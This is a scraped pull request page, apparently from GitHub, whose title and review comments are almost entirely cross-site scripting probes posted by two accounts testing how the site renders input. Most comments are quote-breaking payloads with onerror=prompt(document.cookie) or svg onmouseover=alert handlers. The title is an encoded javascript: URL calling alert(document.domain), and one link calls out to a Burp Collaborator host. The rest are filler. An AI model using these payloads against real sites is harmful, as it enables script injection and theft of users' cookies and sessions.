### PR TITLE
%19Jav%09asc%09ript%3ahttps%20%3a%2f%2fwww%2egithub%2ecom%2f%250Aalert%2528document.domain%2529

### PR DESCRIPTION
**Pull request by elementbeyond**
hhbhbh

### CODE REVIEW

**Comment by kukibrk** [comment]
[url=google.com:/onclick='alert(document.domain)'[url=]]xss[/url]

**Comment by kukibrk** [comment]
a'"`onerror=prompt(document.cookie)\

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')"\

**Comment by kukibrk** [comment]
[test](http://aesp0o9fk3fyb29csn6303icr3xulj.burpcollaborator.net "test ismap="alert xss" yyy="test"")

**Comment by kukibrk** [comment]
a'"`onerror=prompt(document.cookie)

**Comment by kukibrk** [comment]
a'"`onerror=prompt(document.cookie))

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')"-)

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')">)

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')">)

**Comment by kukibrk** [comment]
a'"svg onmouseover="alert('xss')")

**Comment by kukibrk** [comment]
a'"svg onmouseover="alert('blab')">)

**Comment by kukibrk** [comment]
a'"svg onmouseover="alert('ulala')")

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert(`froyo`)">)

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('ulala')")

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('ulala')")

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('ulala')")

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')"%20autofocus%20"%u0022%2 )

**Comment by kukibrk** [comment]
a'"`ulul"

**Comment by kukibrk** [comment]
a'"`asaba)

**Comment by kukibrk** [comment]
a'"`asaba)

**Comment by kukibrk** [comment]
%19Jav%09asc%09ript%3ahttps%20%3a%2f%2fwww%2egithub%2ecom%2f%250Aalert%2528document.domain%2529

**Comment by elementbeyond** [comment]
rrr

**Comment by kukibrk** [comment]
a'"`onerror=prompt(document.cookie)\

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')"\

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')" autofocus "%u0022%2 )

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')")

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')")

**Comment by kukibrk** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrkica** [comment]
a'"a"

**Comment by kukibrkica** [comment]
a"a"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrkica** [comment]
a\

**Comment by kukibrkica** [comment]
a

**Comment by kukibrkica** [comment]
a)

**Comment by kukibrkica** [comment]
a)

**Comment by kukibrkica** [comment]
a

**Comment by kukibrkica** [comment]
a

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')"\

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xxss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xxss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xxss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xxss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('yyyyy')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xxss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xxss')"

**Comment by kukibrkica** [comment]
a'"`svg onmouseover="alert('xxss')"

**Comment by kukibrkica** [comment]
a

**Comment by kukibrkica** [comment]
x

**Comment by kukibrkica** [comment]
x

**Comment by kukibrkica** [comment]
x

**Comment by kukibrkica** [comment]
g

**Comment by kukibrkica** [comment]
l

**Comment by kukibrkica** [comment]
d

**Comment by kukibrkica** [comment]
a

**Pull request closed without merging**
